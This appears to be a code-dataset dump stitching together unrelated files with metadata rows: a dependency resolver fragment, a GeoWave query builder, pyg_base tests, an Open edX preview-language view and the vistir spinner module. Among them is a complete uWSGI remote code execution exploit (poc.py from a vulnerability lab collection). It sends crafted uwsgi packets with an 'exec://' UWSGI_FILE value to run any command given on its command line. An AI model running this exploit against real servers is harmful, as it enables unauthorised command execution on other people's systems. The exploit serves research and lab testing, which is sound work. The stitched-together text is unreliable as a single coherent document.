if equals == len(req.specs):
return True
return False
solutions = OrderedDict()
for pkg_name, pkg_req in six.iteritems(requirements):
LOG.debug("Generating the solution paths for '%s'", pkg_req)
node = tree_generator(pkg_req.req, graph)
solutions[pkg_name] = node
node_paths = []
for sub_node in node:
leaves = []
for n in sub_node.dfs_iter():
if not n.child_count():
leaves.append(n)
paths = []
for n in leaves:
path = []
for p_n in n.path_iter():
if _is_exact(p_n.item):
path.insert(0, p_n.item)
if p_n is sub_node:
break
paths.append(path)
if not paths:
if _is_exact(sub_node.item):
paths.append([sub_node.item])
else:
raise RuntimeError("No solution paths found for '%s'"
% sub_node.item)
LOG.debug("%s solution paths found for '%s' (solution"
" for '%s') found", len(paths), sub_node.item, pkg_req)
for i, path in enumerate(paths):
LOG.debug("Solution path %s:", i)
for p in path:
LOG.debug(" - %s" % p)
node_paths.append(paths)
return {}
def setup_logging(options):
if options.verbose:
logging.basicConfig(level=logging.DEBUG,
format='%(levelname)s: @%(name)s : %(message)s',
stream=sys.stdout)
else:
logging.basicConfig(level=logging.INFO,
format='%(levelname)s: @%(name)s : %(message)s',
stream=sys.stdout)
req_logger = logging.getLogger('requests')
req_logger.setLevel(logging.WARNING)
def main():
def req_cmp(a, b):
return cmp(req_key(a), req_key(b))
parser = create_parser()
options = parser.parse_args()
if not options.requirements:
parser.error("At least one requirement file must be provided")
setup_logging(options)
initial = parse_requirements(options)
for d in ['.download', '.versions', '.graphs']:
scratch_path = os.path.join(options.scratch, d)
if not os.path.isdir(scratch_path):
os.makedirs(scratch_path)
print("Initial package set:")
for r in sorted(list(six.itervalues(initial)), cmp=req_cmp):
print(" - %s" % r)
graph = expand(initial, options)
if options.verbose:
print(graph.pformat())
resolved = resolve(initial, graph, options)
print("Resolved package set:")
for r in sorted(list(six.itervalues(resolved)), cmp=req_cmp):
print(" - %s" % r)
if __name__ == "__main__":
main()
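# Example invocation (a sketch based on the argparse options defined above; the
# script and requirements file names are hypothetical):
#
#   python pippin.py -r requirements.txt -s /tmp/pippin-scratch -v -t 10
#
# This parses requirements.txt, caches downloads and version metadata under the
# scratch directory, and prints the expanded dependency graph when --verbose is set.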
| 37.223958
| 79
| 0.54671
| 11,402
| 0.531785
| 275
| 0.012826
| 302
| 0.014085
| 0
| 0
| 3,572
| 0.166597
|
a2431b76a7fd7273de98b3d8241bb7216ee7d296
| 2,182
|
py
|
Python
|
python/src/main/python/pygw/query/aggregation_query_builder.py
|
radiant-maxar/geowave
|
2d9f39d32e4621c8f5965a4dffff0623c1c03231
|
[
"Apache-2.0"
] | 280
|
2017-06-14T01:26:19.000Z
|
2022-03-28T15:45:23.000Z
|
python/src/main/python/pygw/query/aggregation_query_builder.py
|
radiant-maxar/geowave
|
2d9f39d32e4621c8f5965a4dffff0623c1c03231
|
[
"Apache-2.0"
] | 458
|
2017-06-12T20:00:59.000Z
|
2022-03-31T04:41:59.000Z
|
python/src/main/python/pygw/query/aggregation_query_builder.py
|
radiant-maxar/geowave
|
2d9f39d32e4621c8f5965a4dffff0623c1c03231
|
[
"Apache-2.0"
] | 135
|
2017-06-12T20:39:34.000Z
|
2022-03-15T13:42:30.000Z
|
#
# Copyright (c) 2013-2020 Contributors to the Eclipse Foundation
#
# See the NOTICE file distributed with this work for additional information regarding copyright
# ownership. All rights reserved. This program and the accompanying materials are made available
# under the terms of the Apache License, Version 2.0 which accompanies this distribution and is
# available at http://www.apache.org/licenses/LICENSE-2.0.txt
# ===============================================================================================
from .base_query_builder import BaseQueryBuilder
from .aggregation_query import AggregationQuery
from ..base.type_conversions import StringArrayType
class AggregationQueryBuilder(BaseQueryBuilder):
"""
A builder for creating aggregation queries. This class should not be used directly. Instead, use one of the derived
classes such as `pygw.query.vector.VectorAggregationQueryBuilder`.
"""
def __init__(self, java_ref):
super().__init__(java_ref)
def count(self, *type_names):
"""
        This is a convenience method to set the count aggregation. If no type names
        are given, every type is counted.
Args:
type_names (str): The type names to count results.
Returns:
This query builder.
"""
        if not type_names:
self._java_ref.count()
else:
self._java_ref.count(StringArrayType().to_java(type_names))
return self
def aggregate(self, type_name, j_aggregation):
"""
Provide the Java Aggregation function and the type name to apply the aggregation on.
Args:
type_name (str): The type name to aggregate.
            j_aggregation (Aggregation): The Java aggregation function to apply.
Returns:
This query builder.
"""
return self._java_ref.aggregate(type_name, j_aggregation)
def build(self):
"""
Builds the configured aggregation query.
Returns:
The final constructed `pygw.query.AggregationQuery`.
"""
return AggregationQuery(self._java_ref.build(), self._java_transformer)
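# Illustration (not part of the original module): a hedged sketch of how the
# methods above compose. Only count() and build() are taken from this file; the
# way a concrete builder is obtained (a hypothetical VectorAggregationQueryBuilder)
# and the data-store call are assumptions, not confirmed here.
#
#   builder = VectorAggregationQueryBuilder()   # hypothetical constructor
#   query = builder.count("my_type").build()    # count() returns the builder
#   results = datastore.aggregate(query)        # hypothetical data-store call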
| 35.193548
| 120
| 0.651696
| 1,510
| 0.692026
| 0
| 0
| 0
| 0
| 0
| 0
| 1,442
| 0.660862
|
a243a526c6890fd80b3908d73d1ec8bf0226c2b2
| 6,059
|
py
|
Python
|
tests/test_cells.py
|
nclarey/pyg-base
|
a7b90ea2ad4d740d8e7f8c4a7c9d341d36373862
|
[
"MIT"
] | null | null | null |
tests/test_cells.py
|
nclarey/pyg-base
|
a7b90ea2ad4d740d8e7f8c4a7c9d341d36373862
|
[
"MIT"
] | null | null | null |
tests/test_cells.py
|
nclarey/pyg-base
|
a7b90ea2ad4d740d8e7f8c4a7c9d341d36373862
|
[
"MIT"
] | null | null | null |
from pyg_base import acell, cell, cell_func, dictattr, dt, getargspec, passthru, add_, get_cache
from pyg_base._cell import cell_output, cell_item, cell_inputs, _updated
import pytest
from pyg_base import *
def test_cell():
c = cell(lambda a:a+1)
assert cell_output(c) == ['data']
with pytest.raises(TypeError):
c.go()
c.a = 1
assert c.go().data == 2
assert c().data == 2
assert isinstance(c, dictattr)
def test_cell_go():
c = cell(a = 1)
assert c.go()- _updated == c
a = cell(lambda a: a +1 , a = 1, output = 'b')
a = a.go()
assert a.b == 2
f = lambda a: dict(a3 = a+3, a1 = a+1)
f.output = ['a3', 'a1']
b = cell(f, a = 1)
assert cell_output(b) == f.output
b = b.go()
assert b.a3 == 4 and b.a1 == 2
def test_cell_of_cell():
a = cell(a = 1)
b = cell(data = 2)
self = cell(lambda a,b:a+b, a = a, b=b)
assert self.go().data == 3
def test_cell_fullargspec():
function = lambda a, b = 1, **some_params: 1
assert cell(function).fullargspec == getargspec(function)
def test_cell_func_cell():
f = cell_func(lambda a, b: a+b, unitemized = ['a', 'b'])
a = cell(a = 1)
b = cell(b = 2)
c = cell(f, a = a, b = b)
c = c.go()
assert c.data - _updated == cell(a = 1) + cell(b=2)
a = cell(lambda a: a * 3, a = 1)
b = cell(lambda b: b * 3, b = 2)
c = cell(f, a = a, b = b)
c = c.go()
assert c.data - _updated == (a.go() + b.go()) - _updated
f = cell_func(lambda a, b: a+b, unitemized = ['a', 'b'], uncalled = ['a', 'b'])
c = cell(f, a = a, b = b)
c = c.go()
assert c.data - _updated == (a + b) - _updated
f = cell_func(lambda a, b: a+b)
c = cell(f, a = a, b = b)
c = c.go()
assert c.data == (a.go().data + b.go().data)
f = cell_func(lambda a, b: a+b, uncalled = ['a', 'b'])
c = cell(f, a = a, b = b)
c = c.go()
assert c.data == (a.a + b.b)
def test_cell_func_relabel():
a = cell(passthru, data = 1, a = dict(b = 3), c = [1,2,3])
res = cell_func(add_, a = 'a.b')(a, 1)
assert res[0] == 4 # should pull a['a']['b'] from a
res = cell_func(add_)(a, 1)
assert res[0] == 2 # should pull data
res = cell_func(add_, a = ['c', 1])(a, 1)
assert res[0] == 3 #should pick the '2' from c
res = cell_func(add_, a = ['c', 1])(a, 0)
assert res[0] == 2 #should pick the '1' from c
def test_cell_output():
c = cell()
assert cell_output(c) == ['data']
function = lambda : dict(a = 1, b = 2)
function.output = ['a','b']
c.function = function
assert cell_output(c) == ['a', 'b']
c.function = lambda a: a
assert cell_output(c) == ['data']
def test_cell_item():
d = dict(a = 1)
assert cell_item(d) == d
d = cell(a = 1)
with pytest.raises(KeyError):
assert cell_item(d)
d = cell(a = 1, data = 2)
assert cell_item(d) == 2
assert cell_item(d, 'whatever you put here') == 2
d.output = ['data', 'b']
assert cell_item(d, 'crap') == 2
assert cell_item(d) == 2
d.output = ['b', 'data']
with pytest.raises(KeyError):
cell_item(d, 'crap')
with pytest.raises(KeyError):
cell_item(d, 'b')
with pytest.raises(KeyError):
cell_item(d)
d.output = ['data', 'a']
assert cell_item(d, 'crap') == 2
assert cell_item(d) == 2
assert cell_item(d, 'a') == 1
def test_cell_init():
c = cell(a = 1, b = 2)
assert cell(c) == c
c = cell(lambda a, b: a+ b, a = 1, b = 2)
assert cell(c) == c
d = dict(c)
assert cell(d, x = 5) == c + dict(x = 5)
assert c().data == 3
assert cell_item(c()) == 3
with pytest.raises(KeyError):
cell_item(c)
def test_cell_item_tree():
c = cell(a = dict(b = 1), output = ['a.b'])
assert cell_item(c) == 1
c = cell(a = 1, output = 'a')
assert c._output == ['a']
assert not c.run()
c = cell(a = 1, output = ['a'])
assert c._output == ['a']
assert not c.run()
assert c.__repr__() == "cell\n{'a': 1, 'function': None, 'output': ['a']}"
def test_cell_go_levels():
def f(t1 = None, t2 = None):
_ = [i for i in range(100000)]
return max([dt(t1), dt(t2)])
# f = lambda t1 = None, t2 = None: max([dt(t1), dt(t2)]) # constructing a function that goes deep recursively
a = cell(f)()
b = cell(f, t1 = a)()
c = cell(f, t1 = b)()
d = cell(f, t1 = c)()
e = cell(f, t1 = d)()
assert not e.run() and not e.t1.run() and not e.t1.t1.run()
e0 = e()
assert e0.data == e.data
e1 = e.go(1)
assert e1.data >= e.data and e1.t1.data == e.t1.data
e2 = e.go(2)
assert e2.data >= e.data and e2.t1.data >= e.t1.data and e2.t1.t1.data == e.t1.t1.data
g = e.go(-1)
assert g.data >= e.data and g.t1.data >= e.t1.data and g.t1.t1.data >= e.t1.t1.data and g.t1.t1.t1.data >= e.t1.t1.t1.data
def test_cell_inputs():
c = cell(lambda a, b: a*b , a = 'text', b = 2)
assert cell_inputs(c) == []
assert cell_inputs(c, int) == [2]
assert cell_inputs(c, str) == ['text']
assert cell_inputs(c, (str,int)) == ['text', 2]
d = cell(lambda x, y: x +y, x = [c,c,3], y = [c,4])
assert cell_inputs(d) == [c,c,c]
assert cell_inputs(d, int) == [3,4]
e = cell(lambda x, y: x +y, x = dict(a = d, b = 4), y = [c,5])
assert cell_inputs(e) == [d,c]
assert cell_inputs(e, int) == [4,5]
def test_cell_push_and_updated():
a = cell(passthru, data = 1, pk = 'i', i = 0)()
b = cell(passthru, data = 2, pk = 'i', i = 1)()
GRAPH = get_cache('GRAPH')
assert a._address in GRAPH and b._address in GRAPH
a_ = a; b_ = b
for i in range(2, 10):
c = cell(add_, a = a_, b = b_, pk = 'i', i = i)()
a_ = b_
b_ = c
a = a.push()
UPDATED = get_cache('UPDATED')
assert len(UPDATED) == 0
assert c.data == 89
b = b.go()
assert list(UPDATED.keys()) == [(('i', 1),)]
c.data = 3
b = b.push()
assert UPDATED == {}
| 29.70098
| 126
| 0.523519
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 478
| 0.078891
|
a244d716297448851950a6f197be289befd9e237
| 4,379
|
py
|
Python
|
uwsgi/unacc/poc.py
|
nobgr/vulhub
|
b24a89459fbd98ba76881adb6d4e2fb376792863
|
[
"MIT"
] | 9,681
|
2017-09-16T12:31:59.000Z
|
2022-03-31T23:49:31.000Z
|
uwsgi/unacc/poc.py
|
dingafter/vulhub
|
67547c4ca153980004ccaeab94f77bcc9952d764
|
[
"MIT"
] | 180
|
2017-11-01T08:05:07.000Z
|
2022-03-31T05:26:33.000Z
|
uwsgi/unacc/poc.py
|
dingafter/vulhub
|
67547c4ca153980004ccaeab94f77bcc9952d764
|
[
"MIT"
] | 3,399
|
2017-09-16T12:21:54.000Z
|
2022-03-31T12:28:48.000Z
|
#!/usr/bin/python
# coding: utf-8
######################
# Uwsgi RCE Exploit
######################
# Author: wofeiwo@80sec.com
# Created: 2017-7-18
# Last modified: 2018-1-30
# Note: Just for research purpose
import sys
import socket
import argparse
import requests
def sz(x):
s = hex(x if isinstance(x, int) else len(x))[2:].rjust(4, '0')
s = bytes.fromhex(s) if sys.version_info[0] == 3 else s.decode('hex')
return s[::-1]
def pack_uwsgi_vars(var):
pk = b''
for k, v in var.items() if hasattr(var, 'items') else var:
pk += sz(k) + k.encode('utf8') + sz(v) + v.encode('utf8')
result = b'\x00' + sz(pk) + b'\x00' + pk
return result
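# Illustration (not part of the original exploit): the bytes produced above follow
# the uwsgi packet layout -- a 4-byte header (modifier1, 16-bit little-endian
# datasize, modifier2; here 0 / size / 0) followed by length-prefixed key/value
# pairs, each with a 2-byte little-endian length.
def _example_packet():  # hypothetical helper, added for illustration only
    packed = pack_uwsgi_vars({'A': 'B'})
    assert packed == b'\x00\x06\x00\x00' + b'\x01\x00A' + b'\x01\x00B'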
def parse_addr(addr, default_port=None):
port = default_port
if isinstance(addr, str):
if addr.isdigit():
addr, port = '', addr
elif ':' in addr:
addr, _, port = addr.partition(':')
elif isinstance(addr, (list, tuple, set)):
addr, port = addr
port = int(port) if port else port
return (addr or '127.0.0.1', port)
def get_host_from_url(url):
if '//' in url:
url = url.split('//', 1)[1]
host, _, url = url.partition('/')
return (host, '/' + url)
def fetch_data(uri, payload=None, body=None):
if 'http' not in uri:
uri = 'http://' + uri
s = requests.Session()
# s.headers['UWSGI_FILE'] = payload
if body:
        try:
            import urlparse  # Python 2
        except ImportError:
            from urllib import parse as urlparse  # Python 3
        body_d = dict(urlparse.parse_qsl(urlparse.urlsplit(body).path))
d = s.post(uri, data=body_d)
else:
d = s.get(uri)
return {
'code': d.status_code,
'text': d.text,
'header': d.headers
}
def ask_uwsgi(addr_and_port, mode, var, body=''):
if mode == 'tcp':
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(parse_addr(addr_and_port))
elif mode == 'unix':
s = socket.socket(socket.AF_UNIX)
s.connect(addr_and_port)
s.send(pack_uwsgi_vars(var) + body.encode('utf8'))
response = []
    # Actually we don't need the response; it will block if we run any commands.
# So I comment all the receiving stuff.
# while 1:
# data = s.recv(4096)
# if not data:
# break
# response.append(data)
s.close()
return b''.join(response).decode('utf8')
def curl(mode, addr_and_port, payload, target_url):
host, uri = get_host_from_url(target_url)
path, _, qs = uri.partition('?')
if mode == 'http':
return fetch_data(addr_and_port+uri, payload)
elif mode == 'tcp':
host = host or parse_addr(addr_and_port)[0]
else:
host = addr_and_port
var = {
'SERVER_PROTOCOL': 'HTTP/1.1',
'REQUEST_METHOD': 'GET',
'PATH_INFO': path,
'REQUEST_URI': uri,
'QUERY_STRING': qs,
'SERVER_NAME': host,
'HTTP_HOST': host,
'UWSGI_FILE': payload,
'SCRIPT_NAME': target_url
}
return ask_uwsgi(addr_and_port, mode, var)
def main(*args):
desc = """
This is a uwsgi client & RCE exploit.
    Last modified at 2018-01-30 by wofeiwo@80sec.com
"""
elog = "Example:uwsgi_exp.py -u 1.2.3.4:5000 -c \"echo 111>/tmp/abc\""
parser = argparse.ArgumentParser(description=desc, epilog=elog)
parser.add_argument('-m', '--mode', nargs='?', default='tcp',
help='Uwsgi mode: 1. http 2. tcp 3. unix. The default is tcp.',
dest='mode', choices=['http', 'tcp', 'unix'])
parser.add_argument('-u', '--uwsgi', nargs='?', required=True,
help='Uwsgi server: 1.2.3.4:5000 or /tmp/uwsgi.sock',
dest='uwsgi_addr')
parser.add_argument('-c', '--command', nargs='?', required=True,
help='Command: The exploit command you want to execute, must have this.',
dest='command')
if len(sys.argv) < 2:
parser.print_help()
return
args = parser.parse_args()
if args.mode.lower() == "http":
print("[-]Currently only tcp/unix method is supported in RCE exploit.")
return
    payload = 'exec://' + args.command + "; echo test"  # must have something in the output or uWSGI crashes.
print("[*]Sending payload.")
print(curl(args.mode.lower(), args.uwsgi_addr, payload, '/testapp'))
if __name__ == '__main__':
main()
| 30.2
| 106
| 0.570222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,358
| 0.309975
|
a2453fb1d06de4864cf98c020579a6af505d8bfa
| 4,169
|
py
|
Python
|
Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/dark_lang/views.py
|
osoco/better-ways-of-thinking-about-software
|
83e70d23c873509e22362a09a10d3510e10f6992
|
[
"MIT"
] | 3
|
2021-12-15T04:58:18.000Z
|
2022-02-06T12:15:37.000Z
|
Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/dark_lang/views.py
|
osoco/better-ways-of-thinking-about-software
|
83e70d23c873509e22362a09a10d3510e10f6992
|
[
"MIT"
] | null | null | null |
Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/dark_lang/views.py
|
osoco/better-ways-of-thinking-about-software
|
83e70d23c873509e22362a09a10d3510e10f6992
|
[
"MIT"
] | 1
|
2019-01-02T14:38:50.000Z
|
2019-01-02T14:38:50.000Z
|
"""
Views file for the Darklang Django App
"""
from django.contrib.auth.decorators import login_required
from django.http import Http404
from django.shortcuts import redirect
from django.template.loader import render_to_string
from django.utils.decorators import method_decorator
from django.utils.translation import LANGUAGE_SESSION_KEY
from django.utils.translation import ugettext as _
from web_fragments.fragment import Fragment
from openedx.core.djangoapps.dark_lang import DARK_LANGUAGE_KEY
from openedx.core.djangoapps.dark_lang.models import DarkLangConfig
from openedx.core.djangoapps.plugin_api.views import EdxFragmentView
from openedx.core.djangoapps.user_api.preferences.api import delete_user_preference, set_user_preference
from openedx.core.djangoapps.util.user_messages import PageLevelMessages
LANGUAGE_INPUT_FIELD = 'preview_language'
class PreviewLanguageFragmentView(EdxFragmentView):
"""
View used when a user is attempting to change the preview language using Darklang.
Expected Behavior:
GET - returns a form for setting/resetting the user's dark language
POST - updates or clears the setting to the given dark language
"""
def render_to_fragment(self, request, course_id=None, **kwargs): # lint-amnesty, pylint: disable=arguments-differ, unused-argument
"""
Renders the language preview view as a fragment.
"""
html = render_to_string('dark_lang/preview-language-fragment.html', {})
return Fragment(html)
def create_base_standalone_context(self, request, fragment, **kwargs):
"""
Creates the base context for rendering a fragment as a standalone page.
"""
return {
'uses_bootstrap': True,
}
def standalone_page_title(self, request, fragment, **kwargs):
"""
Returns the page title for the standalone update page.
"""
return _('Preview Language Administration')
@method_decorator(login_required)
def get(self, request, *args, **kwargs):
"""
Renders the fragment to control the preview language.
"""
if not self._user_can_preview_languages(request.user):
raise Http404
return super().get(request, *args, **kwargs)
@method_decorator(login_required)
def post(self, request, **kwargs): # lint-amnesty, pylint: disable=unused-argument
"""
Accept requests to update the preview language.
"""
if not self._user_can_preview_languages(request.user):
raise Http404
action = request.POST.get('action', None)
if action == 'set_preview_language':
self._set_preview_language(request)
elif action == 'reset_preview_language':
self._clear_preview_language(request)
return redirect(request.path)
def _user_can_preview_languages(self, user):
"""
Returns true if the specified user can preview languages.
"""
if not DarkLangConfig.current().enabled:
return False
return user and not user.is_anonymous
def _set_preview_language(self, request):
"""
Sets the preview language for the current user.
"""
preview_language = request.POST.get(LANGUAGE_INPUT_FIELD, '')
if not preview_language.strip():
PageLevelMessages.register_error_message(request, _('Language not provided'))
return
set_user_preference(request.user, DARK_LANGUAGE_KEY, preview_language)
PageLevelMessages.register_success_message(
request,
_('Language set to {preview_language}').format(
preview_language=preview_language
)
)
def _clear_preview_language(self, request):
"""
Clears the preview language for the current user.
"""
delete_user_preference(request.user, DARK_LANGUAGE_KEY)
if LANGUAGE_SESSION_KEY in request.session:
del request.session[LANGUAGE_SESSION_KEY]
PageLevelMessages.register_success_message(
request,
_('Language reset to the default')
)
| 36.893805
| 135
| 0.688894
| 3,308
| 0.793476
| 0
| 0
| 876
| 0.210122
| 0
| 0
| 1,293
| 0.310146
|
a2455b7d1f4c59b3f3fc10bc30bcb0f313e3156b
| 13,480
|
py
|
Python
|
pipenv/vendor/vistir/spin.py
|
erikkemperman/pipenv
|
8707fe52571422ff5aa2905a2063fdf5ce14840b
|
[
"MIT"
] | 3
|
2020-06-04T05:22:33.000Z
|
2020-09-23T19:44:02.000Z
|
pipenv/vendor/vistir/spin.py
|
erikkemperman/pipenv
|
8707fe52571422ff5aa2905a2063fdf5ce14840b
|
[
"MIT"
] | 9
|
2019-12-05T00:49:12.000Z
|
2021-09-08T01:31:25.000Z
|
pipenv/vendor/vistir/spin.py
|
erikkemperman/pipenv
|
8707fe52571422ff5aa2905a2063fdf5ce14840b
|
[
"MIT"
] | 1
|
2019-06-04T10:25:26.000Z
|
2019-06-04T10:25:26.000Z
|
# -*- coding=utf-8 -*-
import functools
import os
import signal
import sys
import threading
import time
import colorama
import cursor
import six
from .compat import to_native_string
from .termcolors import COLOR_MAP, COLORS, colored, DISABLE_COLORS
from io import StringIO
try:
import yaspin
except ImportError:
yaspin = None
Spinners = None
else:
from yaspin.spinners import Spinners
handler = None
if yaspin and os.name == "nt":
handler = yaspin.signal_handlers.default_handler
elif yaspin and os.name != "nt":
handler = yaspin.signal_handlers.fancy_handler
CLEAR_LINE = chr(27) + "[K"
class DummySpinner(object):
def __init__(self, text="", **kwargs):
super(DummySpinner, self).__init__()
if DISABLE_COLORS:
colorama.init()
from .misc import decode_for_output
self.text = to_native_string(decode_for_output(text)) if text else ""
self.stdout = kwargs.get("stdout", sys.stdout)
self.stderr = kwargs.get("stderr", sys.stderr)
self.out_buff = StringIO()
self.write_to_stdout = kwargs.get("write_to_stdout", False)
def __enter__(self):
if self.text and self.text != "None":
if self.write_to_stdout:
self.write(self.text)
return self
def __exit__(self, exc_type, exc_val, traceback):
if exc_type:
import traceback
from .misc import decode_for_output
self.write_err(decode_for_output(traceback.format_exception(*sys.exc_info())))
self._close_output_buffer()
return False
def __getattr__(self, k):
try:
retval = super(DummySpinner, self).__getattribute__(k)
except AttributeError:
if k in COLOR_MAP.keys() or k.upper() in COLORS:
return self
raise
else:
return retval
def _close_output_buffer(self):
if self.out_buff and not self.out_buff.closed:
try:
self.out_buff.close()
except Exception:
pass
def fail(self, exitcode=1, text="FAIL"):
from .misc import decode_for_output
if text and text != "None":
if self.write_to_stdout:
self.write(decode_for_output(text))
else:
self.write_err(decode_for_output(text))
self._close_output_buffer()
def ok(self, text="OK"):
if text and text != "None":
if self.write_to_stdout:
self.stdout.write(self.text)
else:
self.stderr.write(self.text)
self._close_output_buffer()
return 0
def hide_and_write(self, text, target=None):
if not target:
target = self.stdout
from .misc import decode_for_output
if text is None or isinstance(text, six.string_types) and text == "None":
pass
target.write(decode_for_output("\r"))
self._hide_cursor(target=target)
target.write(decode_for_output("{0}\n".format(text)))
target.write(CLEAR_LINE)
self._show_cursor(target=target)
def write(self, text=None):
if not self.write_to_stdout:
return self.write_err(text)
from .misc import decode_for_output
if text is None or isinstance(text, six.string_types) and text == "None":
pass
text = decode_for_output(text)
self.stdout.write(decode_for_output("\r"))
line = decode_for_output("{0}\n".format(text))
self.stdout.write(line)
self.stdout.write(CLEAR_LINE)
def write_err(self, text=None):
from .misc import decode_for_output
if text is None or isinstance(text, six.string_types) and text == "None":
pass
text = decode_for_output(text)
self.stderr.write(decode_for_output("\r"))
line = decode_for_output("{0}\n".format(text))
self.stderr.write(line)
self.stderr.write(CLEAR_LINE)
@staticmethod
def _hide_cursor(target=None):
pass
@staticmethod
def _show_cursor(target=None):
pass
base_obj = yaspin.core.Yaspin if yaspin is not None else DummySpinner
class VistirSpinner(base_obj):
"A spinner class for handling spinners on windows and posix."
def __init__(self, *args, **kwargs):
"""
Get a spinner object or a dummy spinner to wrap a context.
Keyword Arguments:
:param str spinner_name: A spinner type e.g. "dots" or "bouncingBar" (default: {"bouncingBar"})
:param str start_text: Text to start off the spinner with (default: {None})
:param dict handler_map: Handler map for signals to be handled gracefully (default: {None})
:param bool nospin: If true, use the dummy spinner (default: {False})
:param bool write_to_stdout: Writes to stdout if true, otherwise writes to stderr (default: True)
"""
self.handler = handler
colorama.init()
sigmap = {}
if handler:
sigmap.update({
signal.SIGINT: handler,
signal.SIGTERM: handler
})
handler_map = kwargs.pop("handler_map", {})
if os.name == "nt":
sigmap[signal.SIGBREAK] = handler
else:
sigmap[signal.SIGALRM] = handler
if handler_map:
sigmap.update(handler_map)
spinner_name = kwargs.pop("spinner_name", "bouncingBar")
start_text = kwargs.pop("start_text", None)
_text = kwargs.pop("text", "Running...")
kwargs["text"] = start_text if start_text is not None else _text
kwargs["sigmap"] = sigmap
kwargs["spinner"] = getattr(Spinners, spinner_name, "")
write_to_stdout = kwargs.pop("write_to_stdout", True)
self.stdout = kwargs.pop("stdout", sys.stdout)
self.stderr = kwargs.pop("stderr", sys.stderr)
self.out_buff = StringIO()
self.write_to_stdout = write_to_stdout
self.is_dummy = bool(yaspin is None)
super(VistirSpinner, self).__init__(*args, **kwargs)
def ok(self, text="OK", err=False):
"""Set Ok (success) finalizer to a spinner."""
# Do not display spin text for ok state
self._text = None
_text = text if text else "OK"
err = err or not self.write_to_stdout
self._freeze(_text, err=err)
def fail(self, text="FAIL", err=False):
"""Set fail finalizer to a spinner."""
# Do not display spin text for fail state
self._text = None
_text = text if text else "FAIL"
err = err or not self.write_to_stdout
self._freeze(_text, err=err)
def hide_and_write(self, text, target=None):
if not target:
target = self.stdout
from .misc import decode_for_output
if text is None or isinstance(text, six.string_types) and text == "None":
pass
target.write(decode_for_output("\r"))
self._hide_cursor(target=target)
target.write(decode_for_output("{0}\n".format(text)))
target.write(CLEAR_LINE)
self._show_cursor(target=target)
def write(self, text):
if not self.write_to_stdout:
return self.write_err(text)
from .misc import to_text
sys.stdout.write("\r")
self.stdout.write(CLEAR_LINE)
if text is None:
text = ""
text = to_native_string("{0}\n".format(text))
self.stdout.write(text)
self.out_buff.write(to_text(text))
def write_err(self, text):
"""Write error text in the terminal without breaking the spinner."""
from .misc import to_text
self.stderr.write("\r")
self.stderr.write(CLEAR_LINE)
if text is None:
text = ""
text = to_native_string("{0}\n".format(text))
self.stderr.write(text)
self.out_buff.write(to_text(text))
def start(self):
if self._sigmap:
self._register_signal_handlers()
target = self.stdout if self.write_to_stdout else self.stderr
if target.isatty():
self._hide_cursor(target=target)
self._stop_spin = threading.Event()
self._hide_spin = threading.Event()
self._spin_thread = threading.Thread(target=self._spin)
self._spin_thread.start()
def stop(self):
if self._dfl_sigmap:
# Reset registered signal handlers to default ones
self._reset_signal_handlers()
if self._spin_thread:
self._stop_spin.set()
self._spin_thread.join()
target = self.stdout if self.write_to_stdout else self.stderr
if target.isatty():
target.write("\r")
if self.write_to_stdout:
self._clear_line()
else:
self._clear_err()
if target.isatty():
self._show_cursor(target=target)
if self.stderr and self.stderr != sys.stderr:
self.stderr.close()
if self.stdout and self.stdout != sys.stdout:
self.stdout.close()
self.out_buff.close()
def _freeze(self, final_text, err=False):
"""Stop spinner, compose last frame and 'freeze' it."""
if not final_text:
final_text = ""
text = to_native_string(final_text)
self._last_frame = self._compose_out(text, mode="last")
# Should be stopped here, otherwise prints after
# self._freeze call will mess up the spinner
self.stop()
if err or not self.write_to_stdout:
self.stderr.write(self._last_frame)
else:
self.stdout.write(self._last_frame)
def _compose_color_func(self):
fn = functools.partial(
colored,
color=self._color,
on_color=self._on_color,
attrs=list(self._attrs),
)
return fn
def _compose_out(self, frame, mode=None):
# Ensure Unicode input
frame = to_native_string(frame)
if self._text is None:
self._text = ""
text = to_native_string(self._text)
if self._color_func is not None:
frame = self._color_func(frame)
if self._side == "right":
frame, text = text, frame
# Mode
if not mode:
out = to_native_string("\r{0} {1}".format(frame, text))
else:
out = to_native_string("{0} {1}\n".format(frame, text))
return out
def _spin(self):
target = self.stdout if self.write_to_stdout else self.stderr
clear_fn = self._clear_line if self.write_to_stdout else self._clear_err
while not self._stop_spin.is_set():
if self._hide_spin.is_set():
# Wait a bit to avoid wasting cycles
time.sleep(self._interval)
continue
# Compose output
spin_phase = next(self._cycle)
out = self._compose_out(spin_phase)
# Write
target.write(out)
clear_fn()
target.flush()
# Wait
time.sleep(self._interval)
target.write("\b")
def _register_signal_handlers(self):
# SIGKILL cannot be caught or ignored, and the receiving
# process cannot perform any clean-up upon receiving this
# signal.
try:
if signal.SIGKILL in self._sigmap.keys():
raise ValueError(
"Trying to set handler for SIGKILL signal. "
"SIGKILL cannot be cought or ignored in POSIX systems."
)
except AttributeError:
pass
for sig, sig_handler in self._sigmap.items():
# A handler for a particular signal, once set, remains
# installed until it is explicitly reset. Store default
# signal handlers for subsequent reset at cleanup phase.
dfl_handler = signal.getsignal(sig)
self._dfl_sigmap[sig] = dfl_handler
# ``signal.SIG_DFL`` and ``signal.SIG_IGN`` are also valid
# signal handlers and are not callables.
if callable(sig_handler):
# ``signal.signal`` accepts handler function which is
# called with two arguments: signal number and the
# interrupted stack frame. ``functools.partial`` solves
# the problem of passing spinner instance into the handler
# function.
sig_handler = functools.partial(sig_handler, spinner=self)
signal.signal(sig, sig_handler)
def _reset_signal_handlers(self):
for sig, sig_handler in self._dfl_sigmap.items():
signal.signal(sig, sig_handler)
@staticmethod
def _hide_cursor(target=None):
if not target:
target = sys.stdout
cursor.hide(stream=target)
@staticmethod
def _show_cursor(target=None):
if not target:
target = sys.stdout
cursor.show(stream=target)
@staticmethod
def _clear_err():
sys.stderr.write(CLEAR_LINE)
@staticmethod
def _clear_line():
sys.stdout.write(CLEAR_LINE)
def create_spinner(*args, **kwargs):
nospin = kwargs.pop("nospin", False)
use_yaspin = kwargs.pop("use_yaspin", not nospin)
if nospin or not use_yaspin:
return DummySpinner(*args, **kwargs)
return VistirSpinner(*args, **kwargs)
